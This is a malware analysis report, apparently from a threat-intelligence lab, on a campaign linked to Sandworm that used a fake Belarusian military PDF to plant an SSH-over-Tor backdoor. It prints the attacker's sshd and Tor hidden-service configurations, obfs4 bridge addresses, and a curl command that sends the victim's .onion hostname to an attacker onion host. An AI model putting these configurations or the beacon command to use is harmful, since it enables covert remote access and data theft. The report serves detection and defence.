Military-themed lure targeting using weaponized ZIPs and hidden tunneling infrastructure
In October 2025, Cyble Research and Intelligence Labs (CRIL) identified malware that distributed a weaponized ZIP archive masquerading as a military document titled “ТЛГ на убытие на переподготовку.pdf” (TLG for departure for retraining.pdf).
Notably, the attack utilized a Belarusian military lure document targeting Special Operations Command personnel specializing in UAV/Drone operations, suggesting intelligence collection operations focused on regional military capabilities.
This multi-stage attack employs advanced evasion techniques, including double file extensions, anti-sandbox checks, and obfuscated PowerShell execution, to establish persistent backdoor access on targeted systems. The malware deploys a complex infrastructure that combines OpenSSH for Windows with a customized Tor hidden service, featuring obfs4 traffic obfuscation.
This provides threat actors with anonymous remote access via SSH, RDP, SFTP, and SMB protocols. The infection chain, shown in Figure 1 below, outlines the stages of the attack.

At the time of this writing, CRIL successfully connected via SSH to confirm the backdoor functionality. However, no secondary payloads or post-exploitation actions were seen.
CRIL evaluates this October 2025 operation with moderate confidence. The Tactics, Techniques, and Procedures have similarities with those linked to the threat actor associated with UAC-0125.
Sandworm is associated with Russia’s GRU, specifically Unit 74455. Since 2013, it has conducted numerous cyberattacks against Ukraine’s military and critical infrastructure. Key operations include the BlackEnergy attacks, which resulted in power outages in 2015; the large-scale NotPetya malware outbreak in 2017; and the 2023 breach of Kyivstar, Ukraine’s largest telecommunications provider.
The ongoing targeting of military personnel through social engineering campaigns, combined with similar infrastructure patterns and tradecraft, links this operation to past activities of UAC-0125.
The December 2024 Army+ fake installer campaign is a direct precursor to this example, demonstrating Sandworm’s methodical targeting strategy. It involved using malicious NSIS installers spread through fake Cloudflare Workers sites, which deployed PowerShell scripts to create hidden SSH access via the Tor network.
The October 2025 update highlights tactical improvements, indicating ongoing operational growth: the addition of obfs4 (obfuscated bridge protocol) to enhance secure Tor communication, the implementation of scheduled tasks for dependable persistence, and the strategic use of pre-generated RSA keys instead of generating them on the spot to minimize detection risk and operational footprint. These updates demonstrate Sandworm’s adaptability and its commitment to enhancing operational security in response to defensive actions and evolving detection capabilities.
The lure document analyzed in this attack is a Russian-language military order dated October 16, 2025, from military unit B/4 89417 in the Minsk Oblast, demonstrating the threat actor’s understanding of military operations and administrative procedures in the region. This level of authenticity in social engineering materials suggests either prior reconnaissance of legitimate military communications or access to compromised military correspondence channels.
The broader context of this attack aligns with intelligence reporting from Ukraine’s CERT-UA and SSSCIP, which documented over 3,000 cyber incidents in the first half of 2025, many of which leveraged AI-generated phishing content and increasingly sophisticated malware.
Sandworm’s persistent targeting of military systems, such as Army+, combined with parallel operations against other military platforms, including the Delta situational awareness system, underscores the strategic priority Russia places on disrupting command and control capabilities and exfiltrating sensitive operational intelligence to support kinetic military operations.
CRIL assesses with moderate confidence that this October 2025 sample shares TTPs with the December 2024 Army+ campaign attributed to UAC-0125/Sandworm (APT44).
The malicious ZIP archive file named “ТЛГ на убытие на переподготовку.pdf” employs a double extension technique to masquerade as a legitimate PDF document, exploiting user trust in common file formats to initiate the attack chain.
Upon extraction of the ZIP archive, the victim is presented with two components: an LNK (Windows shortcut) file bearing the same Russian filename “ТЛГ на убытие на переподготовку.pdf” and a hidden directory named “FOUND.000”. (See Figure 2)

This hidden folder contains an additional archive file titled “persistentHandlerHashingEncodingScalable.zip”, which is crucial in the subsequent execution stages.
When the victim attempts to open what appears to be a PDF document, the LNK file triggers instead, executing embedded PowerShell commands stored within its target section. (See Figure 3)

This social engineering technique leverages the user’s expectation of viewing a legitimate military document while covertly initiating the malicious payload.
The PowerShell code embedded within the LNK file performs several critical operations. First, it utilizes the Expand-Archive command to extract the contents of “persistentHandlerHashingEncodingScalable.zip” from the Downloads folder into the %appdata%\logicpro directory. Following successful extraction, the script retrieves content from a file named “adaptiveOptimizingDeployingDecodingEncrypting” located within the newly created directory structure.
Finally, this retrieved content is executed through an additional hidden PowerShell instance, effectively establishing the next stage of the attack while maintaining stealth through obfuscated execution methods. (see Figure 4)

The second-stage PowerShell script incorporates simple anti-analysis checks designed to evade detection in sandbox and automated analysis environments. The malware verifies two specific system conditions before proceeding with the infection chain: it confirms that the number of recent LNK files present on the system is greater than or equal to 10 and validates that the current process count exceeds or equals 50.
These checks serve as environmental awareness mechanisms, as sandbox environments typically exhibit fewer user-generated shortcuts and reduced process activity compared to genuine user workstations. If either condition fails to meet the threshold, the script terminates execution, effectively bypassing automated malware analysis systems. (See Figure 5)

Upon successful validation of the environmental checks, the PowerShell script retrieves and displays a PDF document stored within the %appdata%\logicpro directory. This document serves as a decoy, maintaining the illusion of legitimacy while malicious operations proceed in the background.
The decoy PDF reveals a specific targeting strategy focused on the Belarusian military sector. The document’s potential targets are likely personnel within the Special Operations Command of the Belarusian Air Force (CCO BC) who possess operational expertise in unmanned aerial vehicle (UAV) or drone operations. However, at the time of publication, we cannot be sure. (see Figure 5)

While the victim reviews the decoy PDF document, the malware initiates its primary attack sequence in the background. The threat actor establishes persistence through a sophisticated scheduled task mechanism designed to ensure continuous access to the compromised system.
The PowerShell script leverages the Register-ScheduledTask cmdlet to create persistence, utilizing an XML configuration file extracted from the initial ZIP archive. This scheduled task is configured with dual trigger mechanisms: it executes immediately upon user logon and subsequently runs at regular intervals every day at 10:21 AM UTC.
Following registration, the script immediately initiates the scheduled task to begin operations without requiring a system restart.

The first scheduled task executes the following command, as shown below (see Figure 7)

Despite its benign filename suggesting legitimate software, `githubdesktop.exe` is actually the OpenSSH for Windows binary, digitally signed by Microsoft to evade security detection. The executable launches with the configuration file `controllerGatewayEncrypting` as a parameter, establishing an SSH service that listens on port 20321 bound to localhost (127.0.0.1).
The configuration implements strict security measures by disabling password authentication entirely, permitting only RSA key-based authentication for remote access.
SSH Configuration:
The configuration file `controllerGatewayEncrypting` contains the following critical parameters:
Port 20321
ListenAddress 127.0.0.1
HostKey redundantOptimizingInstanceVariableLogging
PubkeyAuthentication yes
PasswordAuthentication no
AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing
Subsystem sftp AppData\Roaming\logicpro\ebay.exe
This configuration restricts authentication to pre-deployed authorized keys stored in `redundantExecutingContainerIndexing`, ensuring that only the threat actor possessing the corresponding private key can establish SSH connections. Additionally, the SFTP subsystem is configured using `ebay.exe`, enabling file transfer capabilities for data exfiltration.
The second scheduled task establishes anonymous network communication through the Tor network (see Figure 8)

The `pinterest.exe` binary is a customized Tor executable that launches with the configuration file `pipelineClusterDeployingCluster`. This configuration establishes a Tor hidden service (.onion address). It implements port forwarding for multiple critical Windows services, enabling the threat actor to access various system resources through the anonymized Tor network.
Tor Hidden Service Configuration:
HiddenServiceDir “socketExecutingLoggingIncrementalCompiler/”
HiddenServicePort 20322 127.0.0.1:20321 # SSH service
HiddenServicePort 11435 127.0.0.1:445 # SMB/File sharing
HiddenServicePort 13893 127.0.0.1:3389 # RDP – Remote Desktop Protocol
HiddenServicePort 12192 127.0.0.1:12191
HiddenServicePort 14763 127.0.0.1:14762
GeoIPFile geoip
GeoIPv6File geoip6
A critical enhancement in this attack is the implementation of obfs4 (obfuscation version 4) pluggable transport, representing a significant evolution from the December 2024 Army+ campaign. The configuration includes:
ClientTransportPlugin obfs4 exec confluence.exe
The obfs4 protocol disguises Tor traffic as innocuous network communications, significantly complicating network-based detection efforts. The confluence.exe executable handles the obfs4 transport layer, while two bridge relays located at 77.20.116.133:8080 and 156.67.24.239:33333 provide entry points into the Tor network. The inclusion of GeoIP databases enables geographic routing analysis and potential refinement of targeting.
Following the successful establishment of the hidden service, the malware constructs a unique .onion URL hostname identifying the compromised system. This hostname is then exfiltrated to the threat actor’s command-and-control infrastructure using the following curl command:
curl --retry 1000 --retry-delay 3 --retry-all-errors -m 120 -s
--socks5-hostname localhost:9050 <Attacker’s onion url>/lst?q=<host name>:<victim’s tor domain>:3-yeeiyem
This command transmits critical information, including the victim’s username, the newly generated Tor hidden service hostname (taibdsgqlwvnizgipp4sn7xee72qys3pufih3rjzhx3e5b5t245kafid.onion), and a campaign identifier.
The curl command is configured with aggressive retry logic (1000 attempts with 3-second delays) to ensure reliable delivery even under adverse network conditions. All traffic is routed through the local Tor SOCKS5 proxy on port 9050 to maintain operational security.
Upon receiving the victim’s .onion URL through the command-and-control channel, the threat actor gains comprehensive remote access capabilities to the compromised system. The attack infrastructure utilizes pre-generated RSA private keys that were embedded within the original malicious archive, eliminating the need for on-the-fly key generation and reducing the operational footprint that could trigger detection mechanisms. (see Figure 9 and Figure 10)

PuTTY was configured with the localhost SOCKS5 proxy settings, and the extracted RSA private key was converted to PPK format using PuTTYgen for authentication. (see Figure 10)

In our simulation, SSH connectivity was successfully established to the test system after completing the proxy and authentication setup. The connection provided full command-line access through the Tor-anonymized channel, confirming the backdoor’s operational functionality. Figure 11 shows the active SSH session, demonstrating how threat actors achieve remote access to compromised systems.

Remote Desktop Protocol (RDP): The threat actor can establish graphical remote desktop sessions by connecting to port 13893 on the victim’s .onion address, which forwards to the local RDP service on port 3389. This provides full interactive desktop access for manual operations.
Secure File Transfer Protocol (SFTP): The exposed SFTP subsystem enables bidirectional file transfer capabilities, allowing the threat actor to exfiltrate sensitive documents, deploy additional malware payloads, or modify system configurations without detection.
Server Message Block (SMB) File Sharing: Access to port 11435 (forwarding to local SMB port 445) enables network file share enumeration and access, facilitating lateral movement within networked environments and large-scale data exfiltration operations.
This multi-protocol access framework provides the threat actor with flexible operational capabilities tailored to specific mission objectives, whether conducting intelligence collection, establishing persistence for long-term access, or preparing for destructive operations.
The backdoor was tested by establishing a controlled SSH connection using the extracted RSA keys and setting up a Tor SOCKS5 proxy. During monitoring, no secondary payloads, post-exploitation commands, or lateral movement were detected, indicating the operation is likely still in reconnaissance or surveillance before active exploitation.
This October 2025 attack showcases the ongoing evolution of state-sponsored cyber espionage targeting military personnel in Eastern Europe. The sophisticated, multi-step infection process combines social engineering with technical countermeasures and relies on an anonymous command-and-control infrastructure. This demonstrates Sandworm’s ongoing enhancements and commitment to maintaining covert access within military networks.
Implementing obfs4-obfuscated Tor communications makes network detection significantly more challenging, so defense teams should focus on analyzing endpoint behavior, monitoring process execution, and auditing scheduled tasks.
Defense sector organizations are vulnerable to social engineering attacks that utilize realistic-looking military documents.
While the TTPs align with other campaigns targeting Ukraine, we cannot confirm at this point whether this is the case with this specific campaign.
| Tactic Name (Tactic ID) | Technique Name (Technique ID) | Simplified Procedure |
| Initial Access (TA0001) | Phishing (T1566) | Malicious ZIP archive disguised as a PDF military document |
| Execution (TA0002) | User Execution: Malicious File (T1204.002) | The victim opens the LNK file, believing it to be a legitimate PDF document. |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | LNK file executes embedded PowerShell commands to extract and execute a malicious payload |
| Persistence (TA0003) | Scheduled Task/Job: Scheduled Task (T1053.005) | Creates scheduled tasks triggering on logon and daily at 10:21 AM UTC to maintain persistence |
| Defense Evasion (TA0005) | Masquerading: Match Legitimate Name or Location (T1036.005) | Uses legitimate software names (githubdesktop.exe, pinterest.exe) to disguise malicious binaries |
| Defense Evasion (TA0005) | Virtualization/Sandbox Evasion (T1497) | Checks for a minimum of 10 LNK files and 50 processes to detect sandbox environments |
| Defense Evasion (TA0005) | Obfuscated Files or Information (T1027) | Uses nested archives, randomized filenames, and obfuscated PowerShell to evade detection |
| Defense Evasion (TA0005) | Indicator Removal: File Deletion (T1070.004) | Executes from %AppData% with hidden folders to minimize forensic footprint |
| Credential Access (TA0006) | Unsecured Credentials: Private Keys (T1552.004) | Deploys pre-generated RSA private keys for SSH authentication embedded in malware archive |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Uses HTTPS via curl to register the victim with the attacker’s C2 infrastructure |
| Command and Control (TA0011) | Encrypted Channel: Asymmetric Cryptography (T1573.002) | Establishes SSH connections using RSA key-based authentication for secure C2 |
| Command and Control (TA0011) | Proxy: Multi-hop Proxy (T1090.003) | Routes all C2 traffic through the Tor network using a SOCKS5 proxy for anonymization |
| Command and Control (TA0011) | Protocol Tunneling (T1572) | Tunnels SSH, RDP, SMB, and SFTP through Tor hidden service .onion addresses |
| Command and Control (TA0011) | Non-Application Layer Protocol (T1095) | Uses obfs4 pluggable transport to disguise Tor traffic as benign communications |
| Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | Exfiltrates data via SFTP subsystem routed through Tor hidden service |
| Exfiltration (TA0010) | Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002) | Uses SSH/SFTP for encrypted data exfiltration, separate from the primary C2 channel |
| Lateral Movement (TA0008) | Remote Services: SMB/Windows Admin Shares (T1021.002) | Exposes SMB port 445 through Tor for network share access and lateral movement |
| Lateral Movement (TA0008) | Remote Services: Remote Desktop Protocol (T1021.001) | Provides RDP access on port 3389 through Tor for interactive system control |
| Indicators | Indicator Type | Description |
| 30a5df544f4a838f9c7ce34377ed2668e0ba22cc39d1e26b303781153808a2c4 | SHA-256 | Zip archive |
| 99ec6437f74eec19e33c1a0b4ac8826bcc44848f87cd1a1c2b379fae9df62de9 | SHA-256 | LNK file |
| 7269b4bc6b3036e5a2f8c2a7908a439202cee9c8b9e50b67c786c39f2500df8f | SHA-256 | Powershell script |
| 5d3a6340691840d1a87bfab543faec77b4a9d457991dd938834de820a99685f7 | SHA-256 | ТЛГ на убытие на переподготовку.pdf– Decoy |
| 08db5bb9812f49f9394fd724b9196c7dc2f61b5ba1644da65db95ab6e430c92b | SHA-256 | obfs4proxy.exe (confluence.exe) – Not malware |
| a0eed0e1ef8fc4129f630e6f68c29c357c717df0fe352961e92e7f8c93e5371b | SHA-256 | SFTP (ebay.exe) – Not malware |
| 710e8c96875d6a3c1b4f08f4b2094c800658551065b20ef3fd450b210dcc7b9a | SHA-256 | OpenSSH for Windows sshd.exe (githubdesktop.exe) – Not malware |
| 7946a2275c1c232eebed6ead95ea4723285950175586db1f95354b910b0a3cce | SHA-256 | pinterest.exe – Not malware |
| yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd.onion | Domain | Domain |